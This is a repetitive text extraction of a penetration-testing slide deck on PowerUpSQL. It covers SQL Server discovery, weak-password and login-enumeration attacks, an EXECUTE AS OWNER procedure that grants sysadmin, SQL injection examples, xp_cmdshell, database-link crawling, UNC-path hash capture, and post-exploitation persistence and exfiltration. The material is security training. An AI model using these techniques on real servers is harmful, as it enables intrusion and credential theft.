Presentation Overview Why SQL Server and PowerShell
PowerUpSQL Overview
Finding amp Accessing SQL Servers
Privilege Escalation Scenarioso Domain user to SQL Server logino SQL Server Login to Sysadmino Sysadmin to Windows Admino Windows Admin to Sysadmino Domain Escalation
Post Exploitation Activities
General Recommendations
Why SQL Server Used in most enterprise environments
Supports local Windows and Domain authentication
Integrates with lots of Windows applications
Generally has trust relationships that other donrsquot
Why PowerShell Native to Windows
Run commands in memory
Run managed net code
Run unmanaged code
Avoid detection by legacy Anti-virus
Already flagged as trusted by most application whitelist solutions
A medium used to write many open source Pentest toolkits
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Presentation Overview Why SQL Server and PowerShell
PowerUpSQL Overview
Finding amp Accessing SQL Servers
Privilege Escalation Scenarioso Domain user to SQL Server logino SQL Server Login to Sysadmino Sysadmin to Windows Admino Windows Admin to Sysadmino Domain Escalation
Post Exploitation Activities
General Recommendations
Why SQL Server Used in most enterprise environments
Supports local Windows and Domain authentication
Integrates with lots of Windows applications
Generally has trust relationships that other donrsquot
Why PowerShell Native to Windows
Run commands in memory
Run managed net code
Run unmanaged code
Avoid detection by legacy Anti-virus
Already flagged as trusted by most application whitelist solutions
A medium used to write many open source Pentest toolkits
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Presentation Overview Why SQL Server and PowerShell
PowerUpSQL Overview
Finding amp Accessing SQL Servers
Privilege Escalation Scenarioso Domain user to SQL Server logino SQL Server Login to Sysadmino Sysadmin to Windows Admino Windows Admin to Sysadmino Domain Escalation
Post Exploitation Activities
General Recommendations
Why SQL Server Used in most enterprise environments
Supports local Windows and Domain authentication
Integrates with lots of Windows applications
Generally has trust relationships that other donrsquot
Why PowerShell Native to Windows
Run commands in memory
Run managed net code
Run unmanaged code
Avoid detection by legacy Anti-virus
Already flagged as trusted by most application whitelist solutions
A medium used to write many open source Pentest toolkits
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
